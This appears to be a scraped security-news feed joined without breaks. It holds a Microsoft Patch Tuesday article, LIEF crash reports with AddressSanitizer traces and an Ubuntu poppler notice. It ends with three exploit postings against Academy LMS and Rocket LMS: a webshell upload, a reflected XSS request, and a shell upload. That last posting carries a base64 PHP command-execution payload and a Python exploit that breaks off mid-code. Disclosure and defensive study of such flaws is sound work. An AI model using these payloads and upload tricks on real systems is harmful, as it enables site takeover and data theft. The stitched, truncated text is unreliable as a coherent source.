Tech giant Microsoft on Tuesday shipped fixes to quash 64 new security flaws across its software lineup, including one zero-day flaw that has been actively exploited in real-world attacks.
Of the 64 bugs, five are rated Critical, 57 are rated Important, one is rated Moderate, and one is rated Low in severity. The patches are in addition to 16 vulnerabilities that Microsoft addressed in its

Tech giant Microsoft on Tuesday shipped fixes to quash 64 new security flaws across its software lineup, including one zero-day flaw that has been actively exploited in real-world attacks.

Of the 64 bugs, five are rated Critical, 57 are rated Important, one is rated Moderate, and one is rated Low in severity. The patches are in addition to 16 vulnerabilities that Microsoft addressed in its Chromium-based Edge browser earlier this month.

"In terms of CVEs released, this Patch Tuesday may appear on the lighter side in comparison to other months," Bharat Jogi, director of vulnerability and threat research at Qualys, said in a statement shared with The Hacker News.

"However, this month hit a sizable milestone for the calendar year, with MSFT having fixed the 1000th CVE of 2022 – likely on track to surpass 2021 which patched 1,200 CVEs in total."

The actively exploited vulnerability in question is CVE-2022-37969 (CVSS score: 7.8), a privilege escalation flaw affecting the Windows Common Log File System (CLFS) Driver, which could be leveraged by an adversary to gain SYSTEM privileges on an already compromised asset.

"An attacker must already have access and the ability to run code on the target system. This technique does not allow for remote code execution in cases where the attacker does not already have that ability on the target system," Microsoft said in an advisory.

The tech giant credited four different sets of researchers from CrowdStrike, DBAPPSecurity, Mandiant, and Zscaler for reporting the flaw, which may be an indication of widespread exploitation in the wild, Greg Wiseman, product manager at Rapid7, said in a statement.

CVE-2022-37969 is also the second actively exploited zero-day flaw in the CLFS component after CVE-2022-24521 (CVSS score: 7.8), the latter of which was resolved by Microsoft as part of its April 2022 Patch Tuesday updates.

It's not immediately clear if CVE-2022-37969 is a patch bypass for CVE-2022-24521. Other critical flaws of note are as follows -

*   **CVE-2022-34718** (CVSS score: 9.8) - Windows TCP/IP Remote Code Execution Vulnerability
*   **CVE-2022-34721** (CVSS score: 9.8) - Windows Internet Key Exchange (IKE) Protocol Extensions Remote Code Execution Vulnerability
*   **CVE-2022-34722** (CVSS score: 9.8) - Windows Internet Key Exchange (IKE) Protocol Extensions Remote Code Execution Vulnerability
*   **CVE-2022-34700** (CVSS score: 8.8) - Microsoft Dynamics 365 (on-premises) Remote Code Execution Vulnerability
*   **CVE-2022-35805** (CVSS score: 8.8) - Microsoft Dynamics 365 (on-premises) Remote Code Execution Vulnerability

"An unauthenticated attacker could send a specially crafted IP packet to a target machine that is running Windows and has IPSec enabled, which could enable a remote code execution exploitation," Microsoft said about CVE-2022-34721 and CVE-2022-34722.

Also resolved by Microsoft are 15 remote code execution flaws in Microsoft ODBC Driver, Microsoft OLE DB Provider for SQL Server, and Microsoft SharePoint Server and five privilege escalation bugs spanning Windows Kerberos and Windows Kernel.

The September release is further notable for patching yet another elevation of privilege vulnerability in the Print Spooler module (CVE-2022-38005, CVSS score: 7.8) that could be abused to obtain SYSTEM-level permissions.

Lastly, included in the raft of security updates is a fix released by chipmaker Arm for a speculative execution vulnerability called Branch History Injection or Spectre-BHB (CVE-2022-23960) that came to light earlier this March.

"This class of vulnerabilities poses a large headache to the organizations attempting mitigation, as they often require updates to the operating systems, firmware and in some cases, a recompilation of applications and hardening," Jogi said. "If an attacker successfully exploits this type of vulnerability, they could gain access to sensitive information."

**Software Patches from Other Vendors**

Aside from Microsoft, security updates have also been released by other vendors since the start of the month to rectify dozens of vulnerabilities, including —

*   Adobe
*   Android
*   Apache Projects
*   Apple
*   Cisco
*   Citrix
*   Dell
*   F5
*   Fortinet
*   GitLab
*   Google Chrome
*   HP
*   IBM
*   Lenovo
*   Linux distributions Debian, Oracle Linux, Red Hat, SUSE, and Ubuntu
*   MediaTek
*   NVIDIA
*   Qualcomm
*   Samba
*   SAP
*   Schneider Electric
*   Siemens
*   Trend Micro
*   VMware, and
*   WordPress (which is dropping support for versions 3.7 through 4.0 starting December 1, 2022)

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Microsoft's Latest Security Update Fixes 64 New Flaws, Including a Zero-Day

LIEF commit 5d1d643 was discovered to contain a heap-buffer overflow in the component /core/CorePrPsInfo.tcc.

**version**

    latest master [5d1d643](https://github.com/lief-project/LIEF/commit/5d1d643a0c46437b57d35654690e03d26d189070)
    

**Build platform**

Ubuntu 20.04.3 LTS (Linux 5.13.0-52-generic x86\_64)

**Build step**

    cmake .. -DCMAKE_CXX_FLAGS="-fsanitize=address -g" -DCMAKE_C_FLAGS="-fsanitize=address -g" -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address"
    

**Run**

    ./build/examples/c/elf_reader poc
    

poc.zip

**AddressSanitizer output**

    Can't access the content of section #0
    Can't access the content of section #1
    Can't access the content of section #2
    =================================================================
    ==2292604==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60d000000268 at pc 0x7f5b35470a7d bp 0x7ffe10d8f4c0 sp 0x7ffe10d8ec68
    READ of size 109 at 0x60d000000268 thread T0
        #0 0x7f5b35470a7c in __interceptor_strlen ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:354
        #1 0x55a087822aa7 in std::char_traits<char>::length(char const*) /usr/include/c++/9/bits/char_traits.h:342
        #2 0x55a087822aa7 in std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::assign(char const*) /usr/include/c++/9/bits/basic_string.h:1443
        #3 0x55a087822aa7 in std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::operator=(char const*) /usr/include/c++/9/bits/basic_string.h:709
        #4 0x55a087822aa7 in void LIEF::ELF::CorePrPsInfo::parse_<LIEF::ELF::details::ELF32>() /home/wcc/LIEF/src/ELF/NoteDetails/core/CorePrPsInfo.tcc:41
        #5 0x55a087822aa7 in LIEF::ELF::CorePrPsInfo::parse() /home/wcc/LIEF/src/ELF/NoteDetails/core/CorePrPsInfo.cpp:156
        #6 0x55a0878260de in LIEF::ELF::CorePrPsInfo::make(LIEF::ELF::Note&) /home/wcc/LIEF/src/ELF/NoteDetails/core/CorePrPsInfo.cpp:44
        #7 0x55a0877383f3 in LIEF::ELF::Note::details() /home/wcc/LIEF/src/ELF/Note.cpp:150
        #8 0x55a08773bbe0 in LIEF::ELF::Note::Note(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, LIEF::ELF::NOTE_TYPES_CORE, std::vector<unsigned char, std::allocator<unsigned char> > const&, LIEF::ELF::Binary*) /home/wcc/LIEF/src/ELF/Note.cpp:92
        #9 0x55a08767077d in std::_MakeUniq<LIEF::ELF::Note>::__single_object std::make_unique<LIEF::ELF::Note, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, LIEF::ELF::NOTE_TYPES_CORE, std::vector<unsigned char, std::allocator<unsigned char> >, LIEF::ELF::Binary*>(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, LIEF::ELF::NOTE_TYPES_CORE&&, std::vector<unsigned char, std::allocator<unsigned char> >&&, LIEF::ELF::Binary*&&) /usr/include/c++/9/bits/unique_ptr.h:857
        #10 0x55a08767077d in LIEF::ELF::Parser::parse_notes(unsigned long, unsigned long) /home/wcc/LIEF/src/ELF/Parser.cpp:568
        #11 0x55a0876ec34e in boost::leaf::result<LIEF::ok_t> LIEF::ELF::Parser::parse_binary<LIEF::ELF::details::ELF32>() /home/wcc/LIEF/src/ELF/Parser.tcc:296
        #12 0x55a08767371e in LIEF::ELF::Parser::init(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) /home/wcc/LIEF/src/ELF/Parser.cpp:323
        #13 0x55a087674f03 in LIEF::ELF::Parser::parse(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, LIEF::ELF::DYNSYM_COUNT_METHODS) /home/wcc/LIEF/src/ELF/Parser.cpp:342
        #14 0x55a087383c06 in elf_parse /home/wcc/LIEF/api/c/ELF/Binary.cpp:67
        #15 0x55a087342c96 in main /home/wcc/LIEF/examples/c/elf_reader.c:16
        #16 0x7f5b34eef0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x240b2)
        #17 0x55a08738373d in _start (/home/wcc/LIEF/build/examples/c/elf_reader+0x31c73d)
    
    0x60d000000268 is located 0 bytes to the right of 136-byte region [0x60d0000001e0,0x60d000000268)
    allocated by thread T0 here:
        #0 0x7f5b35518587 in operator new(unsigned long) ../../../../src/libsanitizer/asan/asan_new_delete.cc:104
        #1 0x55a08773b79b in __gnu_cxx::new_allocator<unsigned char>::allocate(unsigned long, void const*) /usr/include/c++/9/ext/new_allocator.h:114
        #2 0x55a08773b79b in std::allocator_traits<std::allocator<unsigned char> >::allocate(std::allocator<unsigned char>&, unsigned long) /usr/include/c++/9/bits/alloc_traits.h:443
        #3 0x55a08773b79b in std::_Vector_base<unsigned char, std::allocator<unsigned char> >::_M_allocate(unsigned long) /usr/include/c++/9/bits/stl_vector.h:343
        #4 0x55a08773b79b in std::_Vector_base<unsigned char, std::allocator<unsigned char> >::_M_create_storage(unsigned long) /usr/include/c++/9/bits/stl_vector.h:358
        #5 0x55a08773b79b in std::_Vector_base<unsigned char, std::allocator<unsigned char> >::_Vector_base(unsigned long, std::allocator<unsigned char> const&) /usr/include/c++/9/bits/stl_vector.h:302
        #6 0x55a08773b79b in std::vector<unsigned char, std::allocator<unsigned char> >::vector(std::vector<unsigned char, std::allocator<unsigned char> > const&) /usr/include/c++/9/bits/stl_vector.h:552
        #7 0x55a08773b79b in LIEF::ELF::Note::Note(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, LIEF::ELF::NOTE_TYPES_CORE, std::vector<unsigned char, std::allocator<unsigned char> > const&, LIEF::ELF::Binary*) /home/wcc/LIEF/src/ELF/Note.cpp:89
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:354 in __interceptor_strlen
    Shadow bytes around the buggy address:
      0x0c1a7fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c1a7fff8000: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
      0x0c1a7fff8010: 00 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa
      0x0c1a7fff8020: fa fa 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c1a7fff8030: 00 00 00 fa fa fa fa fa fa fa fa fa 00 00 00 00
    =>0x0c1a7fff8040: 00 00 00 00 00 00 00 00 00 00 00 00 00[fa]fa fa
      0x0c1a7fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c1a7fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c1a7fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c1a7fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c1a7fff8090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==2292604==ABORTING

CVE-2022-38306: heap-buffer-overflow in elf_reader · Issue #763 · lief-project/LIEF

LIEF commit 365a16a was discovered to contain a heap-buffer overflow via the function print_binary at /c/macho_reader.c.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

CCWANG19 opened this issue

Aug 10, 2022

· 1 comment

Assignees

**Comments**

**Version****Build platform**

Ubuntu 20.04.3 LTS (Linux 5.13.0-52-generic x86\_64)

**Build step****Run**

    ./build/examples/c/macho_reader poc
    

poc.zip

**Output**

    Can't read the state data
    Can't read the raw data of the load command
    Binary Name: poc
    Header
    ========
    Magic: 0xcefaedfe
    CPU Type: ARM64
    CPU SubType: 0x0
    File type: OBJECT
    Number of commands: 0x13a
    Commands size: 0x0
    flags: 0x0
    reserved: 0x0
    Commands
    ========
    THREAD               0x4040000f 0x00001c 
    =================================================================
    ==3241437==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000152 at pc 0x555c3f7df416 bp 0x7ffc25ef7040 sp 0x7ffc25ef7030
    READ of size 1 at 0x602000000152 thread T0
        #0 0x555c3f7df415 in print_binary /home/wcc/LIEF/examples/c/macho_reader.c:39
        #1 0x555c3f7dff11 in main /home/wcc/LIEF/examples/c/macho_reader.c:150
        #2 0x7fe3286cb0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x240b2)
        #3 0x555c3f7debfd in _start (/home/wcc/LIEF/build/examples/c/macho_reader+0x280bfd)
    
    0x602000000152 is located 1 bytes to the right of 1-byte region [0x602000000150,0x602000000151)
    allocated by thread T0 here:
        #0 0x7fe328cf2808 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144
        #1 0x555c3f8e3d36 in LIEF::MachO::init_c_commands(Macho_Binary_t*, LIEF::MachO::Binary*) /home/wcc/LIEF/api/c/MachO/LoadCommand.cpp:31
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /home/wcc/LIEF/examples/c/macho_reader.c:39 in print_binary
    Shadow bytes around the buggy address:
      0x0c047fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c047fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c047fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c047fff8000: fa fa 00 00 fa fa fd fa fa fa 00 00 fa fa 00 fa
      0x0c047fff8010: fa fa fd fa fa fa 00 fa fa fa 00 fa fa fa 00 fa
    =>0x0c047fff8020: fa fa 00 00 fa fa 00 00 fa fa[01]fa fa fa 00 fa
      0x0c047fff8030: fa fa 00 fa fa fa 00 fa fa fa fa fa fa fa fa fa
      0x0c047fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==3241437==ABORTING
    
    

Thank you again for reporting these issues!

2 participants

CVE-2022-38495: heap-buffer-overflow in macho_reader.c · Issue #767 · lief-project/LIEF

LIEF commit 365a16a was discovered to contain a segmentation violation via the component CoreFile.tcc:69.

**version****Build platform**

Ubuntu 20.04.3 LTS (Linux 5.13.0-52-generic x86\_64)

**Build step****Run**

    ./build/examples/c/elf_reader poc
    

poc.zip

**Output**

    Can't access the content of section #0
      Can't parse section #01
    Binary doesn't have a program header
    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==3230843==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000020 (pc 0x559aec0a79de bp 0x0fffef333808 sp 0x7fff7999c000 T0)
    ==3230843==The signal is caused by a WRITE memory access.
    ==3230843==Hint: address points to the zero page.
        #0 0x559aec0a79dd in std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::_M_length(unsigned long) /usr/include/c++/9/bits/basic_string.h:187
        #1 0x559aec0a79dd in std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::_M_set_length(unsigned long) /usr/include/c++/9/bits/basic_string.h:220
        #2 0x559aec0a79dd in std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::operator=(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&&) /usr/include/c++/9/bits/basic_string.h:756
        #3 0x559aec0a79dd in void LIEF::ELF::CoreFile::parse_<LIEF::ELF::details::ELF32>() /home/wcc/LIEF/src/ELF/NoteDetails/core/CoreFile.tcc:69
        #4 0x559aec09aa70 in LIEF::ELF::CoreFile::parse() /home/wcc/LIEF/src/ELF/NoteDetails/core/CoreFile.cpp:114
        #5 0x559aec09aa8d in LIEF::ELF::CoreFile::make(LIEF::ELF::Note&) /home/wcc/LIEF/src/ELF/NoteDetails/core/CoreFile.cpp:38
        #6 0x559aebfdeb66 in LIEF::ELF::Note::details() /home/wcc/LIEF/src/ELF/Note.cpp:156
        #7 0x559aebfe14ee in LIEF::ELF::Note::Note(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, LIEF::ELF::NOTE_TYPES_CORE, std::vector<unsigned char, std::allocator<unsigned char> > const&, LIEF::ELF::Binary*) /home/wcc/LIEF/src/ELF/Note.cpp:92
        #8 0x559aebf183ac in std::_MakeUniq<LIEF::ELF::Note>::__single_object std::make_unique<LIEF::ELF::Note, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, LIEF::ELF::NOTE_TYPES_CORE, std::vector<unsigned char, std::allocator<unsigned char> >, LIEF::ELF::Binary*>(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, LIEF::ELF::NOTE_TYPES_CORE&&, std::vector<unsigned char, std::allocator<unsigned char> >&&, LIEF::ELF::Binary*&&) /usr/include/c++/9/bits/unique_ptr.h:857
        #9 0x559aebf183ac in LIEF::ELF::Parser::parse_notes(unsigned long, unsigned long) /home/wcc/LIEF/src/ELF/Parser.cpp:568
        #10 0x559aebf8c11c in boost::leaf::result<LIEF::ok_t> LIEF::ELF::Parser::parse_binary<LIEF::ELF::details::ELF32>() /home/wcc/LIEF/src/ELF/Parser.tcc:296
        #11 0x559aebf1bad5 in LIEF::ELF::Parser::init(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) /home/wcc/LIEF/src/ELF/Parser.cpp:323
        #12 0x559aebf1bf8d in LIEF::ELF::Parser::parse(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, LIEF::ELF::DYNSYM_COUNT_METHODS) /home/wcc/LIEF/src/ELF/Parser.cpp:342
        #13 0x559aebc1f3ae in elf_parse /home/wcc/LIEF/api/c/ELF/Binary.cpp:67
        #14 0x559aebc1ce4f in main /home/wcc/LIEF/examples/c/elf_reader.c:16
        #15 0x7f49b9b990b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x240b2)
        #16 0x559aebc1cc3d in _start (/home/wcc/LIEF/build/examples/c/elf_reader+0x281c3d)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV /usr/include/c++/9/bits/basic_string.h:187 in std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::_M_length(unsigned long)
    ==3230843==ABORTING

CVE-2022-38497: SEGV in CoreFile.tcc:69 · Issue #766 · lief-project/LIEF

Ubuntu Security Notice 5606-1 - It was discovered that poppler incorrectly handled certain PDF. An attacker could possibly use this issue to cause a denial of service or execute arbitrary code.

=========================================================================  
Ubuntu Security Notice USN-5606-1  
September 12, 2022

poppler vulnerability  
=========================================================================  
A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 ESM

Summary:

poppler could be made to crash or execute arbitrary code if  
received a specially crafted PDF.

Software Description:  
- poppler: PDF rendering library

Details:

It was discovered that poppler incorrectly handled certain  
PDF. An attacker could possibly use this issue to cause a  
denial of service or execute arbitrary code.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
  libpoppler118                   22.02.0-2ubuntu0.1  
  poppler-utils                   22.02.0-2ubuntu0.1

Ubuntu 20.04 LTS:  
  libpoppler97                    0.86.1-0ubuntu1.1  
  poppler-utils                   0.86.1-0ubuntu1.1

Ubuntu 18.04 LTS:  
  libpoppler73                    0.62.0-2ubuntu2.13  
  poppler-utils                   0.62.0-2ubuntu2.13

Ubuntu 16.04 ESM:  
  libpoppler58                    0.41.0-0ubuntu1.16+esm1  
  poppler-utils                   0.41.0-0ubuntu1.16+esm1

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-5606-1  
  CVE-2022-38784

Package Information:  
  https://launchpad.net/ubuntu/+source/poppler/22.02.0-2ubuntu0.1  
  https://launchpad.net/ubuntu/+source/poppler/0.86.1-0ubuntu1.1  
  https://launchpad.net/ubuntu/+source/poppler/0.62.0-2ubuntu2.13

Ubuntu Security Notice USN-5606-1

Academy Learning Management System version 5.7 suffers from a remote shell upload vulnerability.

    # Exploit Title: Academy Learning Management System 5.7 Shell Upload# Exploit Author: th3d1gger# Vendor Homepage: https://codecanyon.net# Software Link: https://codecanyon.net/item/academy-course-based-learning-management-system/22703468# Version: 5.7# Tested on Ubuntu 18.04Totally wrong architecture for uploading zip files on install addon ---Vulnerable Source Code ---$zipped_file_name = $_FILES['addon_zip']['name'];    if (!empty($zipped_file_name)) {      // Create update directory.      $dir = 'uploads/addons';      if (!is_dir($dir))      mkdir($dir, 0777, true);      $path = "uploads/addons/".$zipped_file_name;      if (class_exists('ZipArchive')) {        move_uploaded_file($_FILES['addon_zip']['tmp_name'], $path);        //Unzip uploaded update file and remove zip file.        $zip = new ZipArchive;        $zip->open($path);        $zip->extractTo('uploads/addons');        $zip->close();        unlink($path);      }else{        $this->session->set_flashdata('error_message', get_phrase('your_server_is_unable_to_extract_the_zip_file').'. '.get_phrase('please_enable_the_zip_extension_on_your_server').', '.get_phrase('then_try_again'));        redirect(site_url('admin/addon'), 'refresh');      }---Exploit------get request route "/admin/addon/add" at admin panel.And then for example download "certificate addon" nulled version.in addons config.json file add""" {            "root_directory"    : "uploads/addons/certificate/others/shell.php",            "update_directory"  : "uploads/certificates/shell.php"        },"""add your webshell to others folder in addon.click install addon button.And ta daa !->get request https://your-url/uploads/certificates/shell.php

Academy Learning Management System 5.7 Shell Upload

Rocket LMS version 1.6 suffers from a cross site scripting vulnerability.

    # Exploit Title: Rocket LMS - Learning Management System Reflected Cross Site Scripting# Exploit Author: th3d1gger# Vendor Homepage: https://codecanyon.net# Software Link: https://codecanyon.net/item/rocket-lms-learning-management-academy-script/33120735# Version: Version 1.6# Tested on Ubuntu 18.04-------Request-----------GET /search?search=%3Cbody%2Fbody%2Fbody%2FOn%2FOnLoAd%3Dconsole.log%281%29%3E%3C%21-- HTTP/1.1Host: localhostsec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Upgrade-Insecure-Requests: 1sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36sec-ch-ua-platform: "Linux"Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: emptyReferer: http://localhost/search?search=%3Cbody%2Fbody%2Fbody%2FOn%2FOnLoAd%3Dconsole.log%281%29%3E%3C%21--Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: allow=1; XSRF-TOKEN=eyJpdiI6ImN0MTZwSkxBTEF0VGVtTmo4cmdxSUE9PSIsInZhbHVlIjoidlEvSDRITWdRaXpXU0Q1amE1cSsxTUNZc0lSVHdRWVVxaUp1cURrM3JQSGNTTTQxRUVjSWdGbUtPZVBWV3FiRk5yU3VHNzBZTU4rNDA1VDlsS1BHdC9FRExpbjdhakhDUk56d1l1VGxlSjdFSWVuR2ZQZXBDamt1MVVkdHBRTUsiLCJtYWMiOiJhOTY5YzU2MzE3NmRjMWM0NzBkNmVlNWI1NmU5MjExZGRhZGU2NzYwY2Y5M2FmNzI5YjViMTRmNjI5Y2E0NjdiIn0%3D; rocketlms_session=eyJpdiI6Im9YRVkvTVYyQkZqNkVKR05xK3VVVGc9PSIsInZhbHVlIjoiS1plaFpXSVVJVGdiSE9vK3MxbTk2S3FSMmx6T1dnSGduZ3RZZERlc28xbmRrSWpuSStpMml0L2hkdFdXS3NmWnhHdlV1MXNicUI5Q2ErR1cwODdkYXFEbnd6WlVTZVlCbEZOZVg0VjJrc2J0ZFNVMzd6TW8rVHE5QXlkdEpmS1UiLCJtYWMiOiJhMDBiNjhmNTA1ZDM3ODMzNGQ2MDA4YTA5Nzk0ZDlhMTM5NjM1OWEwNGZmOTViNmU2MGE2YmQ2NWQwMGUzYWMwIn0%3DConnection: close

Rocket LMS 1.6 Cross Site Scripting

Rocket LMS version 1.6 suffers from a remote shell upload vulnerability.

    # Exploit Title: Rocket LMS - Learning Management System Shell Upload# Exploit Author: th3d1gger# Vendor Homepage: https://codecanyon.net# Software Link: https://codecanyon.net/item/rocket-lms-learning-management-academy-script/33120735# Version: Version 1.6# Tested on Ubuntu 18.04base64 encode your payloadafter data image write your extension upload-----There is .htaccess restriction on rocket lms public folder upload your own htaccess to avatar folder first.Enjoy!-------Request-----------POST /panel/setting HTTP/1.1Host: localhostContent-Length: 214Cache-Control: max-age=0sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"Origin: http://localhostUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36Content-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: emptyReferer: http://localhost/panel/setting/step/2Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: allow=1; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=eyJpdiI6IlBhNzBxQi96TVJwTm5KdEI0Ry9xUUE9PSIsInZhbHVlIjoiUE80Y2h6WlU2N3FjZDBaMldkZU1pcDg3ZmVLWitZSUxsQVBIc0lHdUV0ZkdtL2JYYzZ0Q2RsL1JSQXhVZWFJZGsrcGlOTGJ5Qk8zWWlTVDVWL3ZlNEY3NFpEc1RaT0NSVS9EL2lFWXQyTEtLQXlFR0RPVjREclI4QkMwdWRQb3hzcEtlZ1ZZanQ0ZDAyYWZOMjNjcWo1anFtSFdRdFYwY2laTlJLbnl2TjBVQWdKTlB6Uk4reWlJUTRNSmkrYkhXU1BJMmxpNU05TngxUklxNEM5azY0bFp4NVg2eHdwT1VSci9Od2RCQklsMD0iLCJtYWMiOiI2NzFjZDkxMDRlYWEyODBmMGUxNDg3YmFmZmQ0M2YwMzhlMmViNTYxYjk3YTZmNTk0YzA1MGFkOGY2YmFkN2I1In0%3D; XSRF-TOKEN=eyJpdiI6IjRqa1JIMXQrd0xuZW1za0FXR0lVbGc9PSIsInZhbHVlIjoidXlybG4rTlRraVpXV1dRSE5EWXcrYnVyZnpYUHRmSmpvQ0tuUUI3WEFDZU5HdWpsbXJBRi9WaStzWXVDNEJLa2UzT3BTSkdobzdPc0dUb0V1TzUyMGdPVHRHY3NNR0x2YlpVT1YxMy9DYXVIMGxERktaZXZtT1pPQUF4Y0N6U0IiLCJtYWMiOiI2MTAyMGJlZmFhNjk2ZWRiOWViYjVlZWNhOWUyYzFmYTJjNjdmYTdmZWNmY2ZhMTFjMTg3NmQwMDAxNjg1OTVjIn0%3D; rocketlms_session=eyJpdiI6Ik1yOGpZZmFGRnJMY1BBYkNBVUhYT1E9PSIsInZhbHVlIjoiOWkrN1JmUHhqc21qTlZqdytPdUJaSnpPQW0ybXNlVGpWLzViVzFpbHpheUF2QUJYRTJNUmpCaC9xZk5CRWg1eGpiVFZ4ejFOOTdLZ3NmNTkrQlhheTBBUGNVVDdPa3IvVWVSeTZ3RndxV2FRdWpWRnVvSHhzY2xKUjMvelB4dTAiLCJtYWMiOiIzNTdlNTNmNGNlMDFlMTU5NWVlOTQ1NjM0YjFjZGU4NWJmMTg5NzIzNmRhMTQxMzc4MDIyZGU2ZDM2N2JiODg2In0%3DConnection: close_token=vILAoLnB2BFEaF35K4kMmwLokzOPLMnryeYXQVzS&step=2&next_step=0&profile_image=data%3Aimage%2FPHP%3Bbase64%2CPD9waHAgJGNtZCA9IHN5c3RlbSgkX0dFVFsnY21kJ10pOwoKZWNobyAkY21kOwo/Pg==&cover_img=%2Fstore%2F995%2F7.jpgExploit:import timeimport requestsimport base64import reimport tracebackclass Rocket:    def __init__(self,ssl,host,port,email,password,file):        self._url_to_upload = "/panel/setting"        self._url_to_login = "/login"        self.host = host        self.port = port        self.ssl = ssl        self.email = email        self.password = password        self.file = file    def get_csrf_token(self,client,URL):               fromt = client.get(URL)          if 'XSRF-TOKEN' in client.cookies:                csrftoken = re.findall(r'<input type="hidden" name="_token" value="(.*)"',fromt.text)[0]            return csrftoken        else:               print("Error while fetching token")            return    def login(self):        client = requests.session()        if self.ssl == True:            ssl= "https://"        else:            ssl= 